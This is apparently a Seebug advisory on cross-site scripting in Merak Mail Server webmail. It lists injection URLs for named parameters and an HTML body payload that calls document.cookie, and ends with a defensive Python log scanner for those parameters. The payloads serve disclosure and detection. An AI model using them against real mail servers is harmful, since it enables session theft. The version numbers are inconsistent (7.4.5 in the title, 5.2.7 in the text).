Merak Mail Server 7.4.5 HTML Message Body XSS

2014-07-01T00:00:00
ID SSV:78112
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

Vulnerability description: Multiple cross-site scripting (XSS) vulnerabilities exist in Merak Webmail Server 5.2.7. A remote attacker can inject arbitrary web script or HTML via the category, cserver, ext, global, showgroups, or showlite parameters to address.html, the spage or autoresponder parameters to settings.html, the folder parameter to readmail.html, the attachmentpage_text_error parameter to attachment.html, the folder, ct, or cv parameters to calendar.html, a tag, or the subject of an e-mail message.

Test code:

/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=
/settings.html?autoresponder=1&id=[id]&spage=">[XSS]
/settings.html?autoresponder=">[XSS]&id=[id]&spage=0
/attachment.html?attachmentpage_text_error=">[XSS]

<IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME>

source: http://www.securityfocus.com/bid/10966/info
   
The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities.
   
The vulnerabilities reported are:
- Multiple cross-site scripting vulnerabilities
- An HTML injection vulnerability
- A PHP source code disclosure vulnerability
- An SQL injection vulnerability
   
These vulnerabilities are reported to exist in versions prior to 7.5.2.

<IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME>
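A defender-side check for the reflected parameters listed above, as an added example that is not part of the original advisory: it scans web-server access-log lines for requests to the named pages whose listed parameters carry HTML metacharacters, including double-encoded ones. The combined log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Page -> parameters the advisory names as injectable.
REFLECTED = {
    "address.html": {"category", "cserver", "ext", "global", "showgroups", "showlite"},
    "settings.html": {"spage", "autoresponder"},
    "readmail.html": {"folder"},
    "attachment.html": {"attachmentpage_text_error"},
    "calendar.html": {"folder", "ct", "cv"},
}
# Characters that let a value close an HTML attribute or open a tag.
MARKUP = set("<>\"'")
# Request target inside a combined-log-format line (assumed log format).
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so %253C is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(line):
    """Return (page, parameter) pairs whose value carries markup characters."""
    match = REQ.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    page = url.path.rsplit("/", 1)[-1].lower()
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in REFLECTED.get(page, ()) and MARKUP & set(fully_decode(value)):
            hits.append((page, name))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2014:10:00:00 +0000] "GET /address.html?id=7&sort=name&category=%22%3E%3Cb%3E&cserver=&ext= HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jul/2014:10:00:05 +0000] "GET /settings.html?autoresponder=1&id=7&spage=0 HTTP/1.1" 200 2048',
    '192.0.2.12 - - [01/Jul/2014:10:00:09 +0000] "GET /calendar.html?id=7&cv=%2522%253Cb%253E HTTP/1.1" 200 900',
    '192.0.2.13 - - [01/Jul/2014:10:00:12 +0000] "GET /address.html?id=7&sort=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for page, name in suspicious_params(entry):
            print(f"markup in {page} parameter {name!r}: {entry.split()[0]}")
```

The check only covers query-string parameters; the e-mail subject and message-body vectors the advisory lists do not appear in access logs and need inspection at the mail-content layer.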